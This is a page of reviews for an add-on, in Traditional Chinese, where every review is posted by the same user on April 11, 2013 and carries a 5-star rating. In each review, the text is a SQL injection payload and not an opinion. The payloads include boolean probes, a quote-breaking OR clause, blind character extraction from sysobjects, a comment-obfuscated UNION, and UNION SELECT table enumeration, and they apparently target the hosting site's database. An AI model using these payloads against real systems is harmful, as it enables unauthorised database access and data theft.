評分: 5 / 5 顆星
作者:harish kumar 於 April 11, 2013 發佈 ·
永久網址
1 AND USER_NAME() = 'dbo'
對於這個附加元件,此使用者的其他意見。
評分: 5 / 5 顆星
作者:harish kumar 於 April 11, 2013 發佈 ·
永久網址
1' AND 1=(SELECT COUNT(*) FROM tablenames)
對於這個附加元件,此使用者的其他意見。
評分: 5 / 5 顆星
作者:harish kumar 於 April 11, 2013 發佈 ·
永久網址
1' AND non_existant_table = '1
對於這個附加元件,此使用者的其他意見。
評分: 5 / 5 顆星
作者:harish kumar 於 April 11, 2013 發佈 ·
永久網址
' OR username IS NOT NULL OR username = '
對於這個附加元件,此使用者的其他意見。
評分: 5 / 5 顆星
作者:harish kumar 於 April 11, 2013 發佈 ·
永久網址
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
對於這個附加元件,此使用者的其他意見。
評分: 5 / 5 顆星
作者:harish kumar 於 April 11, 2013 發佈 ·
永久網址
1 UNI/**/ON SELECT ALL FROM WHERE
對於這個附加元件,此使用者的其他意見。
評分: 5 / 5 顆星
作者:harish kumar 於 April 11, 2013 發佈 ·
永久網址
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
對於這個附加元件,此使用者的其他意見。
附加元件
